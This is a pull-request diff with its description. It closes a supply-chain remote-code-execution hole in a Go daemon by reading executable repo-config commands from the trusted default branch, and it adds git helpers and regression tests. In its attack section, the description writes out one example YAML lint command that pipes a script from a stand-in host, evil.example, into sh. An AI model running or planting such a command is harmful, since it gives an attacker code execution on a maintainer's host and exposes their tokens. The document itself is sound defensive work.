+		// default-branch copy controls the switch.
+		selfEnableConfig := fmt.Sprintf("ignore_patterns:\n  - 'vendor/**'\nallow_repo_commands: true\ncommands:\n  lint: \"echo pwned > %s\"\n", markerPath)
+		h.CommitChange(branch, ".no-mistakes.yaml", selfEnableConfig, "self-enable + malicious lint")
+		h.PushToGate(branch)
+
+		run := h.WaitForRun(branch, 90*time.Second)
+		if run.Status != types.RunCompleted {
+			t.Fatalf("run did not complete: status=%s error=%v", run.Status, deref(run.Error))
+		}
+
+		if _, err := os.Stat(markerPath); err == nil {
+			t.Fatalf("SECURITY REGRESSION: pushed-branch allow_repo_commands self-enabled and ran the lint command (marker %s exists); the opt-in must be read from the trusted default branch, not the pushed SHA", markerPath)
+		}
+	})
 }
 
 // pushMaliciousRepoConfig creates a feature branch carrying a hostile

--- a/internal/git/git.go
+++ b/internal/git/git.go
@@ -341,6 +341,19 @@ func WorktreeRemove(ctx context.Context, repoDir, wtPath string) error {
 	return err
 }
 
+// ResolveRef returns the commit SHA that ref resolves to via
+// `git rev-parse --verify <ref>^{commit}`. Use it to pin an exact commit
+// (e.g. the default-branch tip just fetched) before reading a file from it,
+// so a shared-ref worktree cannot serve a stale remote-tracking ref. Returns
+// an error if the ref does not resolve to a commit.
+func ResolveRef(ctx context.Context, dir, ref string) (string, error) {
+	out, err := Run(ctx, dir, "rev-parse", "--verify", "--quiet", ref+"^{commit}")
+	if err != nil {
+		return "", fmt.Errorf("resolve ref %s: %w", ref, err)
+	}
+	return out, nil
+}
+
 // RefExists reports whether the given ref resolves to a commit. It uses
 // `git rev-parse --verify --quiet` so a missing ref is a clean (nil, false)
 // result rather than a loud error.

--- a/internal/git/git.go
+++ b/internal/git/git.go
@@ -2,6 +2,7 @@ package git
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os/exec"
 	"path/filepath"
@@ -338,4 +339,33 @@ func WorktreeAdd(ctx context.Context, repoDir, wtPath, sha string) error {
 func WorktreeRemove(ctx context.Context, repoDir, wtPath string) error {
 	_, err := Run(ctx, repoDir, "worktree", "remove", "--force", wtPath)
 	return err
+}
+
+// RefExists reports whether the given ref resolves to a commit. It uses
+// `git rev-parse --verify --quiet` so a missing ref is a clean (nil, false)
+// result rather than a loud error.
+func RefExists(ctx context.Context, dir, ref string) (bool, error) {
+	cmd := exec.CommandContext(ctx, "git", "-C", dir, "rev-parse", "--verify", "--quiet", ref+"^{commit}")
+	cmd.Env = NonInteractiveEnv(dir)
+	if err := cmd.Run(); err != nil {
+		var ee *exec.ExitError
+		if errors.As(err, &ee) && ee.ExitCode() == 1 {
+			return false, nil
+		}
+		return false, fmt.Errorf("git rev-parse %s: %w", ref, err)
+	}
+	return true, nil
+}
+
+// ShowFile returns the content of path as stored at the given ref (e.g.
+// "HEAD", "origin/main", or a SHA) via `git show <ref>:<path>`. A failure
+// (e.g. the path is absent at the ref) is returned as the underlying git
+// error from Run; callers that need to distinguish "absent" from a real
+// failure should check RefExists first or inspect the error text.
+func ShowFile(ctx context.Context, dir, ref, path string) (string, error) {
+	out, err := Run(ctx, dir, "show", fmt.Sprintf("%s:%s", ref, path))
+	if err != nil {
+		return "", err
+	}
+	return out, nil
 }

--- a/internal/git/git_showfile_test.go
+++ b/internal/git/git_showfile_test.go
@@ -41,6 +41,29 @@ func TestShowFile_AtHEAD(t *testing.T) {
 	}
 }
 
+func TestResolveRef(t *testing.T) {
+	ctx := context.Background()
+	repo := initTestRepo(t)
+	want := run(t, repo, "git", "rev-parse", "HEAD")
+
+	got, err := ResolveRef(ctx, repo, "HEAD")
+	if err != nil {
+		t.Fatalf("ResolveRef HEAD: %v", err)
+	}
+	if got != want {
+		t.Errorf("ResolveRef HEAD = %q, want %q", got, want)
+	}
+}
+
+func TestResolveRef_MissingRef(t *testing.T) {
+	ctx := context.Background()
+	repo := initTestRepo(t)
+
+	if _, err := ResolveRef(ctx, repo, "origin/does-not-exist"); err == nil {
+		t.Fatal("expected error resolving a missing ref")
+	}
+}
+
 func TestShowFile_AtBranchRef(t *testing.T) {
 	ctx := context.Background()
 	src := initTestRepo(t)

--- a/internal/git/git_showfile_test.go
+++ b/internal/git/git_showfile_test.go
@@ -1,0 +1,89 @@
+package git
+
+import (
+	"context"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestRefExists(t *testing.T) {
+	ctx := context.Background()
+	repo := initTestRepo(t)
+
+	ok, err := RefExists(ctx, repo, "HEAD")
+	if err != nil {
+		t.Fatalf("RefExists HEAD: %v", err)
+	}
+	if !ok {
+		t.Fatal("HEAD should exist")
+	}
+
+	ok, err = RefExists(ctx, repo, "origin/nonexistent")
+	if err != nil {
+		t.Fatalf("RefExists missing ref: %v", err)
+	}
+	if ok {
+		t.Fatal("missing ref should not exist")
+	}
+}
+
+func TestShowFile_AtHEAD(t *testing.T) {
+	ctx := context.Background()
+	repo := initTestRepo(t)
+
+	content, err := ShowFile(ctx, repo, "HEAD", "README.md")
+	if err != nil {
+		t.Fatalf("ShowFile HEAD:README.md: %v", err)
+	}
+	if content != "# test" {
+		t.Errorf("content = %q, want %q", content, "# test")
+	}
+}
+
+func TestShowFile_AtBranchRef(t *testing.T) {
+	ctx := context.Background()
+	src := initTestRepo(t)
+	bare := filepath.Join(t.TempDir(), "bare.git")
+	if err := InitBare(ctx, bare); err != nil {
+		t.Fatal(err)
+	}
+	// The gate bare repo records the upstream as origin; the linked worktree
+	// shares that config, so the daemon's `git fetch origin <branch>` works.
+	if err := AddRemote(ctx, bare, "origin", bare); err != nil {
+		t.Fatalf("add origin to bare: %v", err)
+	}
+	run(t, src, "git", "remote", "add", "origin", bare)
+	run(t, src, "git", "push", "origin", "HEAD:refs/heads/main")
+
+	// Fetch into a remote-tracking ref like the daemon does for the worktree.
+	wt := filepath.Join(t.TempDir(), "worktree")
+	sha := run(t, src, "git", "rev-parse", "HEAD")
+	if err := WorktreeAdd(ctx, bare, wt, sha); err != nil {
+		t.Fatalf("WorktreeAdd: %v", err)
+	}
+	if err := FetchRemoteBranch(ctx, wt, "origin", "main"); err != nil {
+		t.Fatalf("FetchRemoteBranch: %v", err)
+	}
+
+	content, err := ShowFile(ctx, wt, "origin/main", "README.md")
+	if err != nil {
+		t.Fatalf("ShowFile origin/main:README.md: %v", err)
+	}
+	if content != "# test" {
+		t.Errorf("content = %q, want %q", content, "# test")
+	}
+}
+
+func TestShowFile_AbsentPath(t *testing.T) {
+	ctx := context.Background()
+	repo := initTestRepo(t)
+
+	_, err := ShowFile(ctx, repo, "HEAD", "does-not-exist.yaml")
+	if err == nil {
+		t.Fatal("expected error for absent path")
+	}
+	if !strings.Contains(err.Error(), "does-not-exist.yaml") {
+		t.Errorf("error should mention the path: %v", err)
+	}
+}


### PR DESCRIPTION
> :warning: **Security-sensitive — please review carefully.** This closes a **supply-chain RCE** in the daemon's repo-config loading. It is a **breaking trust-boundary change**: contributors can no longer ship executable `commands.*` on their branch. Details + the attack below.

Fixes the top finding of the robustness audit (Supply-chain RCE via repo-config `commands.*`).

## Intent

A contributor who can land a SHA on a gated branch should **not** get shell on the maintainer's daemon host. Today they can.

## The attack

`startRun` creates the run worktree at the **pushed SHA**, then `config.LoadRepo(wtDir)` reads `.no-mistakes.yaml` from that checked-out (contributor) branch (`internal/daemon/manager.go`). The resulting `commands.{test,lint,format}` strings run **verbatim** via `sh -c` (POSIX) / `cmd.exe /c` (`internal/pipeline/steps/common_exec.go`) — as the maintainer, with the maintainer's env (`GH_TOKEN`, SSH agent socket, etc.).

A contributor opens (or force-pushes) a PR whose `.no-mistakes.yaml` contains:

```yaml
commands:
  lint: "curl evil.example/p.sh | sh; exit 1"
```

When the gate processes the push, the payload runs on the daemon host. There is no filtering, no allowlist, no diff against the default-branch copy.

## Approach

Load the **code-executing fields from the trusted default branch** (`origin/<defaultBranch>`) instead of the pushed SHA, and add an explicit opt-in for the legacy behavior.

- **Primary fix** — `internal/daemon/manager.go` `startRun`: after the existing default-branch fetch into the worktree, `loadTrustedRepoConfig` reads `.no-mistakes.yaml` from `origin/<defaultBranch>` via `git show`. `config.EffectiveRepoConfig(pushed, trusted, allowRepoCommands)` then builds the effective config:
  - `commands.*` come **only** from the trusted copy when present;
  - when no trusted copy exists and the maintainer has **not** opted in, `commands` is **forced empty** (blocks the vector for repos that ship `.no-mistakes.yaml` only on feature branches) — it never falls back to the pushed branch;
  - non-executing fields (`agent`, `ignore_patterns`, `auto_fix`, `intent`, `test`) are still read from the pushed branch — they cannot run arbitrary shell, so existing behavior is preserved.
- **Belt-and-suspenders** — `allow_repo_commands: true` in global config (`internal/config/config.go`, default `false`). A maintainer who genuinely wants pushed-branch commands (e.g. a trusted single-developer repo) sets it with eyes open. When enabled, the daemon logs a `WARN` on every run.
- New git helpers (`internal/git/git.go`): `RefExists` and `ShowFile`.
- When pushed vs. effective commands differ under the secure default, the daemon logs an `INFO` line so a maintainer who shipped a `commands.*` change on a feature branch understands why it didn't run.

| Repo config field | Source | Why |
|---|---|---|
| `commands.{test,lint,format}` | **default branch** (trusted) | runs as `sh -c` on the daemon host |
| `agent`, `ignore_patterns`, `auto_fix`, `intent`, `test` | pushed branch (unchanged) | cannot run arbitrary shell |

## Scope

- `internal/daemon/manager.go` — `startRun` + new `loadTrustedRepoConfig` helper.
- `internal/config/config.go` — `EffectiveRepoConfig`, `LoadRepoFromBytes` (refactor of existing parse), `AllowRepoCommands` field wired through `LoadGlobal`.
- `internal/git/git.go` — `RefExists`, `ShowFile`.
- Docs: `repo-config.md` (caution callout on the trust boundary) + `global-config.md` (`allow_repo_commands` reference).
- `AGENTS.md`: documents the trust-boundary invariant for future contributors.

## Risk

- **Breaking trust-boundary change.** `commands.*` authored on a feature branch are **no longer honored** unless (a) the same `commands` exist on the default branch, or (b) the maintainer sets `allow_repo_commands: true`. This is the intended security posture. Maintainers who relied on per-branch commands must commit them to the default branch or opt in.
- **No regression for the common case.** When the maintainer's `.no-mistakes.yaml` lives on the default branch (the documented setup), the trusted and pushed copies match, so the same commands run. Verified by the existing `TestUserJourney` suite (all three agents) which exercises command-bearing steps.
- **Trusted-config load is best-effort and never fatal.** If `origin/<defaultBranch>` is unavailable or the file is absent, the daemon falls back to empty commands (secure) and continues; non-executing fields still load from the pushed branch. No new run-start failure paths.
- **Network/refs:** relies on the default-branch fetch that `startRun` already performs (and the rebase step already depends on) — no new remote calls beyond a local `git show` of an already-fetched ref.

## Verification

`gofmt -l .` clean · `go vet ./...` clean · `genskill --check` up to date · `go build ./cmd/no-mistakes` OK · `go test -race ./...` green (Go 1.26.4) · full `make e2e` suite green.

New tests:

- **`TestRepoConfigCommandsFromDefaultBranch`** (`internal/e2e/repo_config_security_test.go`, e2e build tag) — the defining regression guard. A feature branch carries a malicious `.no-mistakes.yaml` (`commands.lint` writes a marker file) pushed to a gated repo:
  - `blocked_by_default` — under the secure default, the marker is **never created** (commands come from the trusted default-branch copy, which has none); run completes and the lint step reaches a terminal status.
  - `executes_when_opted_in` — with `allow_repo_commands: true`, the same payload **does** run, proving the assertion is meaningful rather than a no-op.
- **Unit tests** — `config.EffectiveRepoConfig` (trusted overrides pushed; opt-in honors pushed; no-trusted disables; nil-pushed safe defaults), `LoadRepoFromBytes`, `LoadGlobal` `allow_repo_commands` parse + default-false; git `RefExists` / `ShowFile` (HEAD, remote-tracking ref, absent path).

The e2e harness models a trusted single-developer environment, so it defaults `allow_repo_commands` to `true` (preserving prior behavior for every existing journey test); security tests pass `false` via `SetupOpts.AllowRepoCommands` to exercise the secure default.

---

AI disclosure: **Human-reviewed.** The change was produced with AI assistance and reviewed by a human contributor before submission.
